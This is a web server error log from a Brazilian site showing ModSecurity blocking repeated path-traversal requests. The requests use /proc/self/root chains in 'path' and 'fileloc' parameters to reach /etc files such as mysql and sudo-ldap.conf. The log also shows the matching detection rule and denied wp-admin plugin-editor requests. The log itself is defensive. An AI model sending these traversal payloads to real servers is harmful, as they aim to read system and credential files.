[Fri Mar 20 11:00:56.223624 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.243.128:49478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TFzJ3M9BSuKP7CAZMGQAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:00:58.938776 2026] [access_compat:error] [pid 10189:tid 140411557287680] [client 142.248.80.157:55469] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/admin-ajax.php, referer: https://bandeirantesbombas.com.br/wp-admin/plugin-editor.php
[Fri Mar 20 11:01:00.387425 2026] [:error] [pid 11642:tid 140411616036608] [client 216.73.216.191:41266] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1THLninkcc-iUj5AqEDQAAA48"]
[Fri Mar 20 11:01:03.199695 2026] [:error] [pid 7893:tid 140411708356352] [client 216.73.216.191:41420] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1THxCii7xarUs8iHaQ9gAAAgQ"]
[Fri Mar 20 11:01:04.819382 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:49484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TIF1pVZ5mVmJwsFNV_AAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:01:06.255185 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:59528] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TIvXLqtnMIWvjpaLCVQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:01:13.711686 2026] [:error] [pid 10189:tid 140411708356352] [client 216.73.216.191:41854] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1TJzJ3M9BSuKP7CAZMPQAAAIQ"]
[Fri Mar 20 11:01:15.867526 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:33412] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TKzJ3M9BSuKP7CAZMRAAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:01:20.807505 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:33418] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TMNa6ubjKNq_cu4YBLgAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:01:24.811591 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:54482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TMwF0L0L-SsrnPo6QNQAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 11:01:25.667163 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.85:42496] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TNda6ubjKNq_cu4YBMQAAA1c"]
[Fri Mar 20 11:01:26.457934 2026] [mime_magic:error] [pid 26799:tid 140411607643904] (70014)End of file found: [client 57.141.18.51:42520] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:01:36.516029 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:58248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TQOoXxyEfFpUF8f-m6QAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:01:42.138661 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:40184] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TRTJ3M9BSuKP7CAZMVwAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:01:42.819074 2026] [:error] [pid 15826:tid 140411649607424] [client 57.141.18.91:43146] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1TRuoXxyEfFpUF8f-m7QAAAUs"]
[Fri Mar 20 11:01:47.061595 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:40200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TSfXLqtnMIWvjpaLCfAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:01:49.439504 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:53382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TTfXLqtnMIWvjpaLCgwAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:01:50.711966 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:53384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TTvXLqtnMIWvjpaLChAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:01:54.291854 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:53392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TUgF0L0L-SsrnPo6QXAAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:02:09.323376 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:53404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TYfXLqtnMIWvjpaLCmwAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:02:09.683394 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.30:44010] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TYfqxLDW4GITHUkQQjQAAAQA"]
[Fri Mar 20 11:02:12.222736 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:34334] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TZNa6ubjKNq_cu4YBVAAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:02:13.530633 2026] [access_compat:error] [pid 26799:tid 140411725141760] [client 142.248.80.157:52535] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/theme-install.php, referer: https://www.google.com/
[Fri Mar 20 11:02:14.997500 2026] [access_compat:error] [pid 26799:tid 140411582465792] [client 142.248.80.157:52535] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/admin-ajax.php, referer: https://bandeirantesbombas.com.br/wp-admin/plugin-editor.php
[Fri Mar 20 11:02:19.993795 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.241.31:34342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Ta11pVZ5mVmJwsFNWOgAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:02:22.362807 2026] [:error] [pid 7235:tid 140411708356352] [client 57.141.18.56:44668] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1TbvqxLDW4GITHUkQQpgAAAQQ"]
[Fri Mar 20 11:02:25.906756 2026] [:error] [pid 10189:tid 140411632822016] [client 74.7.241.31:58280] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1TcTJ3M9BSuKP7CAZMgwAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
